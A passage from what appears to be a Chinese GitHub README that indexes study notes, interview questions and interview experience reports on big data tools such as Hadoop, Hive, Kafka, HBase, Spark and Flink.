Streaming——Dstream基础](https://github.com/Dr11ft/BigDataGuide/blob/master/Spark/Spark%20Streaming/2%E3%80%81Dstream%E5%9F%BA%E7%A1%80.md) -  3.[Spark Streaming——Dstream的转换&输出](https://github.com/Dr11ft/BigDataGuide/blob/master/Spark/Spark%20Streaming/3%E3%80%81Dstream%E7%9A%84%E8%BD%AC%E6%8D%A2%26%E8%BE%93%E5%87%BA.md) - -### 八、Flink -  1.[Flink——Flink核心概述](https://github.com/Dr11ft/BigDataGuide/blob/master/Flink/1%E3%80%81Flink%E6%A6%82%E8%BF%B0.md) -  2.[Flink——Flink部署](https://github.com/Dr11ft/BigDataGuide/blob/master/Flink/2%E3%80%81Flink%E9%83%A8%E7%BD%B2.md) -  3.[Flink——Flink运行架构](https://github.com/Dr11ft/BigDataGuide/blob/master/Flink/3、Flink运行架构.md) -  4.[Flink——Flink流处理API](https://github.com/Dr11ft/BigDataGuide/blob/master/Flink/4%E3%80%81Flink%E6%B5%81%E5%A4%84%E7%90%86API.md) -  5.[Flink——Flink中的Window](https://github.com/Dr11ft/BigDataGuide/blob/master/Flink/5%E3%80%81Flink%E4%B8%AD%E7%9A%84Window.md) -  6.[Flink——时间语义与Wartermark](https://github.com/Dr11ft/BigDataGuide/blob/master/Flink/6、时间语义与Wartermark.md) -  7.[Flink——ProcessFunction API(底层API)](https://github.com/Dr11ft/BigDataGuide/blob/master/Flink/7%E3%80%81ProcessFunction%20API%EF%BC%88%E5%BA%95%E5%B1%82API%EF%BC%89.md) -  8.[Flink——状态编程和容错机制](https://github.com/Dr11ft/BigDataGuide/blob/master/Flink/8%E3%80%81%E7%8A%B6%E6%80%81%E7%BC%96%E7%A8%8B%E5%92%8C%E5%AE%B9%E9%94%99%E6%9C%BA%E5%88%B6.md) -  9.[Flink——Table API 与SQL](https://github.com/Dr11ft/BigDataGuide/blob/master/Flink/9%E3%80%81Table%20API%20%E4%B8%8ESQL.md) -  10.[Flink——Flink CEP](https://github.com/Dr11ft/BigDataGuide/blob/master/Flink/10%E3%80%81Flink%20CEP.md) - -数据仓库 ---- -  [数据仓库总结](https://zhuanlan.zhihu.com/p/371365562) - -大数据项目 ---- -  **基本上选择三到四个即可,B站直接搜索项目名字,都有视频** -  **详细说明公众号(旧时光大数据)回复“大数据项目”即可** - -读书笔记 ---- -#### 《阿里大数据之路》读书笔记 -[第一章 总述](https://github.com/MoRan1607/BigDataGuide/blob/master/Docs/%E3%80%8A%E9%98%BF%E9%87%8C%E5%A4%A7%E6%95%B0%E6%8D%AE%E4%B9%8B%E8%B7%AF%E3%80%8B%E8%AF%BB%E4%B9%A6%E7%AC%94%E8%AE%B0%EF%BC%9A%E7%AC%AC%E4%B8%80%E7%AB%A0%20%E6%80%BB%E8%BF%B0.md) - -[第二章 日志采集](https://github.com/MoRan1607/BigDataGuide/blob/master/Docs/%E7%AC%AC%E4%BA%8C%E7%AB%A0%EF%BC%9A%E6%97%A5%E5%BF%97%E9%87%87%E9%9B%86.pdf) - -[第三章 数据同步](https://github.com/MoRan1607/BigDataGuide/blob/master/Docs/PDF/%E7%AC%AC%E4%B8%89%E7%AB%A0%EF%BC%9A%E6%95%B0%E6%8D%AE%E5%90%8C%E6%AD%A5.pdf) - -[第四章 离线数据开发](https://github.com/MoRan1607/BigDataGuide/blob/master/Docs/PDF/%E7%AC%AC%E5%9B%9B%E7%AB%A0%EF%BC%9A%E7%A6%BB%E7%BA%BF%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91.pdf) - -面试题 ---- -> #### 陆续更新中。。。。。全量面试题(700+道牛客网面经原题)见知识星球 -### [大数据面试题 V1.0](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E8%AF%95%E9%A2%98%20V1.0.md) -### [大数据面试题 V3.0](https://mp.weixin.qq.com/s/hMcuDEkzH49rfSmGWy_GRg) -### [大数据面试题 V4.0](https://mp.weixin.qq.com/s/NV90886HAQqBRB1hPNiIPQ) -#### 一、Hadoop -##### 1、Hadoop基础 -[介绍下Hadoop](https://blog.csdn.net/qq_41544550/article/details/123031348) -[Hadoop小文件处理问题](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/Hadoop%E9%9D%A2%E8%AF%95%E9%A2%98%E6%80%BB%E7%BB%93/Hadoop/Hadoop%E5%B0%8F%E6%96%87%E4%BB%B6%E5%A4%84%E7%90%86%E9%97%AE%E9%A2%98.md) -[Hadoop中的几个进程和作用](https://github.com/MoRan1607/BigDataGuide/blob/master/Hadoop/%E9%9D%A2%E8%AF%95%E9%A2%98/Hadoop/%E9%9D%A2%E8%AF%95%E9%A2%98/Hadoop%E4%B8%AD%E7%9A%84%E5%87%A0%E4%B8%AA%E8%BF%9B%E7%A8%8B%E5%92%8C%E4%BD%9C%E7%94%A8.pdf) -[Hadoop的mapper和reducer的个数如何确定?reducer的个数依据是什么?](https://github.com/MoRan1607/BigDataGuide/blob/master/Hadoop/%E9%9D%A2%E8%AF%95%E9%A2%98/Hadoop/%E9%9D%A2%E8%AF%95%E9%A2%98/Hadoop%E7%9A%84mapper%E5%92%8Creducer%E7%9A%84%E4%B8%AA%E6%95%B0%E5%A6%82%E4%BD%95%E7%A1%AE%E5%AE%9A%EF%BC%9Freducer%E7%9A%84%E4%B8%AA%E6%95%B0%E4%BE%9D%E6%8D%AE%E6%98%AF%E4%BB%80%E4%B9%88%EF%BC%9F.md) - -##### 2、HDFS -[HDFS读写流程](https://blog.csdn.net/qq_41544550/article/details/103113335) -[HDFS的block为什么是128M?增大或减小有什么影响?](https://github.com/MoRan1607/BigDataGuide/blob/master/Hadoop/%E9%9D%A2%E8%AF%95%E9%A2%98/Hadoop/%E9%9D%A2%E8%AF%95%E9%A2%98/HDFS%E7%9A%84block%E4%B8%BA%E4%BB%80%E4%B9%88%E6%98%AF128M%EF%BC%9F%E5%A2%9E%E5%A4%A7%E6%88%96%E5%87%8F%E5%B0%8F%E6%9C%89%E4%BB%80%E4%B9%88%E5%BD%B1%E5%93%8D%EF%BC%9F/HDFS%E7%9A%84block%E4%B8%BA%E4%BB%80%E4%B9%88%E6%98%AF128M%EF%BC%9F%E5%A2%9E%E5%A4%A7%E6%88%96%E5%87%8F%E5%B0%8F%E6%9C%89%E4%BB%80%E4%B9%88%E5%BD%B1%E5%93%8D.md) - -##### 3、MapReduce -[介绍下MapReduce](https://blog.csdn.net/qq_41544550/article/details/123674103) -[MapReduce优缺点](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/Hadoop%E9%9D%A2%E8%AF%95%E9%A2%98%E6%80%BB%E7%BB%93/Hadoop/MapReduce%E4%BC%98%E7%BC%BA%E7%82%B9.md) -[MapReduce工作原理(流程)](https://github.com/MoRan1607/BigDataGuide/blob/master/Hadoop/%E9%9D%A2%E8%AF%95%E9%A2%98/Hadoop/%E9%9D%A2%E8%AF%95%E9%A2%98/MapReduce%E5%B7%A5%E4%BD%9C%E5%8E%9F%E7%90%86%EF%BC%88%E6%B5%81%E7%A8%8B%EF%BC%89.pdf) -[MapReduce压缩方式](https://github.com/MoRan1607/BigDataGuide/blob/master/Hadoop/%E9%9D%A2%E8%AF%95%E9%A2%98/Hadoop/%E9%9D%A2%E8%AF%95%E9%A2%98/MapReduce%E5%8E%8B%E7%BC%A9%E6%96%B9%E5%BC%8F.pdf) - -##### 4、YARN -[介绍下YARN](https://blog.csdn.net/qq_41544550/article/details/123826496?spm=1001.2014.3001.5501) - -#### 二、Zookeeper -[介绍下Zookeeper是什么?](https://blog.csdn.net/qq_41544550/article/details/123148663) -[Zookeeper有什么作用?优缺点?有什么应用场景?](https://blog.csdn.net/qq_41544550/article/details/123148688) -[Zookeeper架构](https://github.com/MoRan1607/BigDataGuide/blob/master/Zookeeper/%E9%9D%A2%E8%AF%95%E9%A2%98/Zookeeper%E6%9E%B6%E6%9E%84.pdf) - -#### 三、Hive -[说下为什么要使用Hive?Hive的优缺点?Hive的作用是什么?](https://blog.csdn.net/qq_41544550/article/details/123333839) -[Hive的用户自定义函数实现步骤与流程](https://github.com/MoRan1607/BigDataGuide/blob/master/Hive/%E9%9D%A2%E8%AF%95%E9%A2%98/Hive%E7%9A%84%E7%94%A8%E6%88%B7%E8%87%AA%E5%AE%9A%E4%B9%89%E5%87%BD%E6%95%B0%E5%AE%9E%E7%8E%B0%E6%AD%A5%E9%AA%A4%E4%B8%8E%E6%B5%81%E7%A8%8B/Hive%E7%9A%84%E7%94%A8%E6%88%B7%E8%87%AA%E5%AE%9A%E4%B9%89%E5%87%BD%E6%95%B0%E5%AE%9E%E7%8E%B0%E6%AD%A5%E9%AA%A4%E4%B8%8E%E6%B5%81%E7%A8%8B.md) -[Hive分区和分桶的区别](https://github.com/MoRan1607/BigDataGuide/blob/master/Hive/%E9%9D%A2%E8%AF%95%E9%A2%98/Hive%E7%9A%84%E7%94%A8%E6%88%B7%E8%87%AA%E5%AE%9A%E4%B9%89%E5%87%BD%E6%95%B0%E5%AE%9E%E7%8E%B0%E6%AD%A5%E9%AA%A4%E4%B8%8E%E6%B5%81%E7%A8%8B/Hive%E5%88%86%E5%8C%BA%E5%92%8C%E5%88%86%E6%A1%B6%E7%9A%84%E5%8C%BA%E5%88%AB.md) -[Hive的cluster by 、sort by、distribute by 、order by 区别?](https://github.com/MoRan1607/BigDataGuide/blob/master/Hive/%E9%9D%A2%E8%AF%95%E9%A2%98/Hive%E7%9A%84%E7%94%A8%E6%88%B7%E8%87%AA%E5%AE%9A%E4%B9%89%E5%87%BD%E6%95%B0%E5%AE%9E%E7%8E%B0%E6%AD%A5%E9%AA%A4%E4%B8%8E%E6%B5%81%E7%A8%8B/Hive%E7%9A%84cluster%20by%20%E3%80%81sort%20by%E3%80%81distribute%20by%20%E3%80%81order%20by%20%E5%8C%BA%E5%88%AB%EF%BC%9F.pdf) -[Hive count(distinct)有几个reduce,海量数据会有什么问题?](https://github.com/MoRan1607/BigDataGuide/blob/master/Hive/%E9%9D%A2%E8%AF%95%E9%A2%98/Hive%E7%9A%84%E7%94%A8%E6%88%B7%E8%87%AA%E5%AE%9A%E4%B9%89%E5%87%BD%E6%95%B0%E5%AE%9E%E7%8E%B0%E6%AD%A5%E9%AA%A4%E4%B8%8E%E6%B5%81%E7%A8%8B/Hive%20count(distinct)%E6%9C%89%E5%87%A0%E4%B8%AAreduce%EF%BC%8C%E6%B5%B7%E9%87%8F%E6%95%B0%E6%8D%AE%E4%BC%9A%E6%9C%89%E4%BB%80%E4%B9%88%E9%97%AE%E9%A2%98%EF%BC%9F.pdf) - -#### 四、Flume -[介绍下Flume](https://blog.csdn.net/qq_41544550/article/details/123451528?spm=1001.2014.3001.5501) -[Flume结构](https://github.com/MoRan1607/BigDataGuide/blob/master/Flume/%E9%9D%A2%E8%AF%95%E9%A2%98/Flume%E6%9E%B6%E6%9E%84/Flume%E6%9E%B6%E6%9E%84.md) - -#### 五、Kafka -[介绍下Kafka,Kafka的作用?Kafka的组件?适用场景?](https://blog.csdn.net/qq_41544550/article/details/123534948) -[Kafka实现高吞吐的原理?](https://github.com/MoRan1607/BigDataGuide/blob/master/Kafka/%E9%9D%A2%E8%AF%95%E9%A2%98/Kafka%E5%AE%9E%E7%8E%B0%E9%AB%98%E5%90%9E%E5%90%90%E7%9A%84%E5%8E%9F%E7%90%86.pdf) -[Kafka的一条message中包含了哪些信息?](https://github.com/MoRan1607/BigDataGuide/blob/master/Kafka/%E9%9D%A2%E8%AF%95%E9%A2%98/Kafka%E7%9A%84%E4%B8%80%E6%9D%A1message%E4%B8%AD%E5%8C%85%E5%90%AB%E4%BA%86%E5%93%AA%E4%BA%9B%E4%BF%A1%E6%81%AF%EF%BC%9F.pdf) -[Kafka的消费者和消费者组有什么区别?为什么需要消费者组?](https://github.com/MoRan1607/BigDataGuide/blob/master/Kafka/%E9%9D%A2%E8%AF%95%E9%A2%98/Kafka%E7%9A%84%E6%B6%88%E8%B4%B9%E8%80%85%E5%92%8C%E6%B6%88%E8%B4%B9%E8%80%85%E7%BB%84%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB%EF%BC%9F%E4%B8%BA%E4%BB%80%E4%B9%88%E9%9C%80%E8%A6%81%E6%B6%88%E8%B4%B9%E8%80%85%E7%BB%84%EF%BC%9F.pdf) -[Kafka的ISR、OSR和ACK介绍,ACK分别有几种值?](https://github.com/MoRan1607/BigDataGuide/blob/master/Kafka/%E9%9D%A2%E8%AF%95%E9%A2%98/Kafka%E7%9A%84ISR%E3%80%81OSR%E5%92%8CACK%E4%BB%8B%E7%BB%8D%EF%BC%8CACK%E5%88%86%E5%88%AB%E6%9C%89%E5%87%A0%E7%A7%8D%E5%80%BC%EF%BC%9F.pdf) -[Kafka怎么保证数据不丢失,不重复?](https://github.com/MoRan1607/BigDataGuide/blob/master/Kafka/%E9%9D%A2%E8%AF%95%E9%A2%98/Kafka%E6%80%8E%E4%B9%88%E4%BF%9D%E8%AF%81%E6%95%B0%E6%8D%AE%E4%B8%8D%E4%B8%A2%E5%A4%B1%EF%BC%8C%E4%B8%8D%E9%87%8D%E5%A4%8D%EF%BC%9F.pdf) -[Kafka的单播和多播](https://github.com/MoRan1607/BigDataGuide/blob/master/Kafka/%E9%9D%A2%E8%AF%95%E9%A2%98/Kafka%E7%9A%84%E5%8D%95%E6%92%AD%E5%92%8C%E5%A4%9A%E6%92%AD.pdf) -[说下Kafka的ISR机制](https://github.com/MoRan1607/BigDataGuide/blob/master/Kafka/%E9%9D%A2%E8%AF%95%E9%A2%98/%E8%AF%B4%E4%B8%8BKafka%E7%9A%84ISR%E6%9C%BA%E5%88%B6.pdf) - -#### 六、HBase -[介绍下HBase架构](https://blog.csdn.net/qq_41544550/article/details/123583361) -[HBase为什么查询快](https://github.com/MoRan1607/BigDataGuide/blob/master/HBase/%E9%9D%A2%E8%AF%95%E9%A2%98/HBase%E4%B8%BA%E4%BB%80%E4%B9%88%E6%9F%A5%E8%AF%A2%E5%BF%AB.pdf) -[HBase的大合并、小合并是什么?](https://github.com/MoRan1607/BigDataGuide/blob/master/HBase/%E9%9D%A2%E8%AF%95%E9%A2%98/HBase%E7%9A%84%E5%A4%A7%E5%90%88%E5%B9%B6%E3%80%81%E5%B0%8F%E5%90%88%E5%B9%B6%E6%98%AF%E4%BB%80%E4%B9%88%EF%BC%9F.pdf) -[HBase的rowkey设计原则](https://github.com/MoRan1607/BigDataGuide/blob/master/HBase/%E9%9D%A2%E8%AF%95%E9%A2%98/HBase%E7%9A%84rowkey%E8%AE%BE%E8%AE%A1%E5%8E%9F%E5%88%99.pdf) -[HBase的一个region由哪些东西组成?](https://github.com/MoRan1607/BigDataGuide/blob/master/HBase/%E9%9D%A2%E8%AF%95%E9%A2%98/HBase%E7%9A%84%E4%B8%80%E4%B8%AAregion%E7%94%B1%E5%93%AA%E4%BA%9B%E4%B8%9C%E8%A5%BF%E7%BB%84%E6%88%90%EF%BC%9F.pdf) -[HBase读写数据流程](https://github.com/MoRan1607/BigDataGuide/blob/master/HBase/%E9%9D%A2%E8%AF%95%E9%A2%98/HBase%E8%AF%BB%E5%86%99%E6%95%B0%E6%8D%AE%E6%B5%81%E7%A8%8B.pdf) -[HBase的RegionServer宕机以后怎么恢复的?](https://github.com/MoRan1607/BigDataGuide/blob/master/HBase/%E9%9D%A2%E8%AF%95%E9%A2%98/HBase%E7%9A%84RegionServer%E5%AE%95%E6%9C%BA%E4%BB%A5%E5%90%8E%E6%80%8E%E4%B9%88%E6%81%A2%E5%A4%8D%E7%9A%84%EF%BC%9F.pdf) -[HBase的读写缓存](https://github.com/MoRan1607/BigDataGuide/blob/master/HBase/%E9%9D%A2%E8%AF%95%E9%A2%98/HBase%E7%9A%84%E8%AF%BB%E5%86%99%E7%BC%93%E5%AD%98.pdf) - -#### 七、Spark - -[说下对RDD的理解?RDD特点、算子?](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/Spark%E9%9D%A2%E8%AF%95%E9%A2%98%E6%95%B4%E7%90%86/Spark/Pics/%E8%AF%B4%E4%B8%8B%E5%AF%B9RDD%E7%9A%84%E7%90%86%E8%A7%A3%EF%BC%9FRDD%E7%89%B9%E7%82%B9%E3%80%81%E7%AE%97%E5%AD%90/%E8%AF%B4%E4%B8%8B%E5%AF%B9RDD%E7%9A%84%E7%90%86%E8%A7%A3%EF%BC%9FRDD%E7%89%B9%E7%82%B9%E3%80%81%E7%AE%97%E5%AD%90.md) -[Spark小文件问题](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/Spark%E9%9D%A2%E8%AF%95%E9%A2%98%E6%95%B4%E7%90%86/Spark/Spark%E5%B0%8F%E6%96%87%E4%BB%B6%E9%97%AE%E9%A2%98/Spark%E5%B0%8F%E6%96%87%E4%BB%B6%E9%97%AE%E9%A2%98.md) -[Spark的内存模型](https://github.com/MoRan1607/BigDataGuide/blob/master/Spark/%E9%9D%A2%E8%AF%95%E9%A2%98/Spark%E7%9A%84%E5%86%85%E5%AD%98%E6%A8%A1%E5%9E%8B/Spark%E7%9A%84%E5%86%85%E5%AD%98%E6%A8%A1%E5%9E%8B.md) -[Spark的Job、Stage、Task分别介绍下,如何划分?](https://github.com/MoRan1607/BigDataGuide/blob/master/Spark/%E9%9D%A2%E8%AF%95%E9%A2%98/Spark%E7%9A%84%E5%86%85%E5%AD%98%E6%A8%A1%E5%9E%8B/Spark%E7%9A%84Job%E3%80%81Stage%E3%80%81Task%E5%88%86%E5%88%AB%E4%BB%8B%E7%BB%8D%E4%B8%8B%EF%BC%8C%E5%A6%82%E4%BD%95%E5%88%92%E5%88%86.md) -[Spark的RDD、DataFrame、DataSet、DataStream区别?](https://github.com/MoRan1607/BigDataGuide/blob/master/Spark/%E9%9D%A2%E8%AF%95%E9%A2%98/Spark%E7%9A%84%E5%86%85%E5%AD%98%E6%A8%A1%E5%9E%8B/Spark%E7%9A%84RDD%E3%80%81DataFrame%E3%80%81DataSet%E3%80%81DataStream%E5%8C%BA%E5%88%AB%EF%BC%9F.pdf) -[RDD的容错](https://github.com/MoRan1607/BigDataGuide/blob/master/Spark/%E9%9D%A2%E8%AF%95%E9%A2%98/Spark%E7%9A%84%E5%86%85%E5%AD%98%E6%A8%A1%E5%9E%8B/RDD%E7%9A%84%E5%AE%B9%E9%94%99.pdf) -[说下Spark中的Transform和Action,为什么Spark要把操作分为Transform和Action?](https://github.com/MoRan1607/BigDataGuide/blob/master/Spark/%E9%9D%A2%E8%AF%95%E9%A2%98/Spark%E7%9A%84%E5%86%85%E5%AD%98%E6%A8%A1%E5%9E%8B/%E8%AF%B4%E4%B8%8BSpark%E4%B8%AD%E7%9A%84Transform%E5%92%8CAction%EF%BC%8C%E4%B8%BA%E4%BB%80%E4%B9%88Spark%E8%A6%81%E6%8A%8A%E6%93%8D%E4%BD%9C%E5%88%86%E4%B8%BATransform%E5%92%8CAction%EF%BC%9F.pdf) -[Spark的任务执行流程](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/Spark%E9%9D%A2%E8%AF%95%E9%A2%98%E6%95%B4%E7%90%86/Spark%E7%9A%84%E4%BB%BB%E5%8A%A1%E6%89%A7%E8%A1%8C%E6%B5%81%E7%A8%8B.pdf) -[Spark的架构](https://github.com/MoRan1607/BigDataGuide/blob/master/Spark/%E9%9D%A2%E8%AF%95%E9%A2%98/Spark%E7%9A%84%E6%9E%B6%E6%9E%84.pdf) - - -#### 八、Flink - -[介绍下Flink](https://github.com/MoRan1607/BigDataGuide/blob/master/Flink/%E4%BB%8B%E7%BB%8D%E4%B8%8BFlink) -[Flink架构](https://github.com/MoRan1607/BigDataGuide/blob/master/Flink/%E9%9D%A2%E8%AF%95%E9%A2%98/Flink%E6%9E%B6%E6%9E%84.pdf) - -#### 九、数仓面试题 -[数据仓库和数据中台区别](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E6%95%B0%E4%BB%93/%E6%95%B0%E6%8D%AE%E4%BB%93%E5%BA%93%E5%92%8C%E6%95%B0%E6%8D%AE%E4%B8%AD%E5%8F%B0%E5%8C%BA%E5%88%AB.pdf) - -#### 十、综合面试题 -[Spark和MapReduce之间的区别?各自优缺点?](https://github.com/MoRan1607/BigDataGuide/blob/master/Spark/%E9%9D%A2%E8%AF%95%E9%A2%98/Spark%E7%9A%84%E5%86%85%E5%AD%98%E6%A8%A1%E5%9E%8B/Spark%E5%92%8CMapReduce%E4%B9%8B%E9%97%B4%E7%9A%84%E5%8C%BA%E5%88%AB%EF%BC%9F%E5%90%84%E8%87%AA%E4%BC%98%E7%BC%BA%E7%82%B9%EF%BC%9F.pdf) -[Spark和Flink的区别](https://github.com/MoRan1607/BigDataGuide/blob/master/Flink/%E9%9D%A2%E8%AF%95%E9%A2%98/Spark%E5%92%8CFlink%E7%9A%84%E5%8C%BA%E5%88%AB.pdf) - - -牛客网面经 ---- -### 大数据面经 -#### 阿里面经 -[阿里巴巴 二面凉经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E9%98%BF%E9%87%8C%E5%B7%B4%E5%B7%B4%20%E4%BA%8C%E9%9D%A2%E5%87%89%E7%BB%8F.pdf) -[阿里云大数据平台三面+HR面【已OC】](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E9%98%BF%E9%87%8C%E4%BA%91%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%B9%B3%E5%8F%B0%E4%B8%89%E9%9D%A2%2BHR%E9%9D%A2%E3%80%90%E5%B7%B2OC%E3%80%91.pdf) -[阿里-数据研发-1面2面](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E9%98%BF%E9%87%8C-%E6%95%B0%E6%8D%AE%E7%A0%94%E5%8F%91-1%E9%9D%A22%E9%9D%A2.pdf) -[4.23阿里数开一面](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E9%98%BF%E9%87%8C-01/4.23%E9%98%BF%E9%87%8C%E6%95%B0%E5%BC%80%E4%B8%80%E9%9D%A2.pdf) -[分享一个大数据的面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E9%98%BF%E9%87%8C-01/%E5%88%86%E4%BA%AB%E4%B8%80%E4%B8%AA%E5%A4%A7%E6%95%B0%E6%8D%AE%E7%9A%84%E9%9D%A2%E7%BB%8F.pdf) -[十余家公司大数据开发面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E9%98%BF%E9%87%8C-01/%E5%8D%81%E4%BD%99%E5%AE%B6%E5%85%AC%E5%8F%B8%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%E9%9D%A2%E7%BB%8F.pdf) -[大数据面经好少啊,我来写点](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E9%98%BF%E9%87%8C-01/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F%E5%A5%BD%E5%B0%91%E5%95%8A%EF%BC%8C%E6%88%91%E6%9D%A5%E5%86%99%E7%82%B9.pdf) -[提前批面经(Java_大数据)](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E9%98%BF%E9%87%8C-01/%E6%8F%90%E5%89%8D%E6%89%B9%E9%9D%A2%E7%BB%8F(Java_%E5%A4%A7%E6%95%B0%E6%8D%AE).pdf) -[阿里-数据技术与产品部(两次简历面)](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E9%98%BF%E9%87%8C-01/%E9%98%BF%E9%87%8C-%E6%95%B0%E6%8D%AE%E6%8A%80%E6%9C%AF%E4%B8%8E%E4%BA%A7%E5%93%81%E9%83%A8%EF%BC%88%E4%B8%A4%E6%AC%A1%E7%AE%80%E5%8E%86%E9%9D%A2%EF%BC%89.pdf) -[阿里云一二三面凉经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E9%98%BF%E9%87%8C-01/%E9%98%BF%E9%87%8C%E4%BA%91%E4%B8%80%E4%BA%8C%E4%B8%89%E9%9D%A2%E5%87%89%E7%BB%8F.pdf) -[阿里巴巴淘系大数据研发工程师三面面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E9%98%BF%E9%87%8C-01/%E9%98%BF%E9%87%8C%E5%B7%B4%E5%B7%B4%E6%B7%98%E7%B3%BB%E5%A4%A7%E6%95%B0%E6%8D%AE%E7%A0%94%E5%8F%91%E5%B7%A5%E7%A8%8B%E5%B8%88%E4%B8%89%E9%9D%A2%E9%9D%A2%E7%BB%8F.pdf) -[阿里集团大淘宝一面凉经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E9%98%BF%E9%87%8C-01/%E9%98%BF%E9%87%8C%E9%9B%86%E5%9B%A2%E5%A4%A7%E6%B7%98%E5%AE%9D%E4%B8%80%E9%9D%A2%E5%87%89%E7%BB%8F.pdf) -[阿里巴巴 二面凉经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E9%98%BF%E9%87%8C%E5%B7%B4%E5%B7%B4%20%E4%BA%8C%E9%9D%A2%E5%87%89%E7%BB%8F.pdf) - -#### 腾讯面经 -[2022暑假实习 数据开发 字节 腾讯](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/2022%E6%9A%91%E5%81%87%E5%AE%9E%E4%B9%A0%20%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%20%E5%AD%97%E8%8A%82%20%E8%85%BE%E8%AE%AF%EF%BC%88%E5%B7%B2offer.pdf) -[4.13 腾讯音乐数据工程笔试](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/4.13%20%E8%85%BE%E8%AE%AF%E9%9F%B3%E4%B9%90%E6%95%B0%E6%8D%AE%E5%B7%A5%E7%A8%8B%E7%AC%94%E8%AF%95.pdf) -[2024届秋招总结](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/2024%E5%B1%8A%E7%A7%8B%E6%8B%9B%E6%80%BB%E7%BB%93.pdf) -[5.30腾讯数据开发一面面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/5.30%E8%85%BE%E8%AE%AF%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%E4%B8%80%E9%9D%A2%E9%9D%A2%E7%BB%8F.pdf) 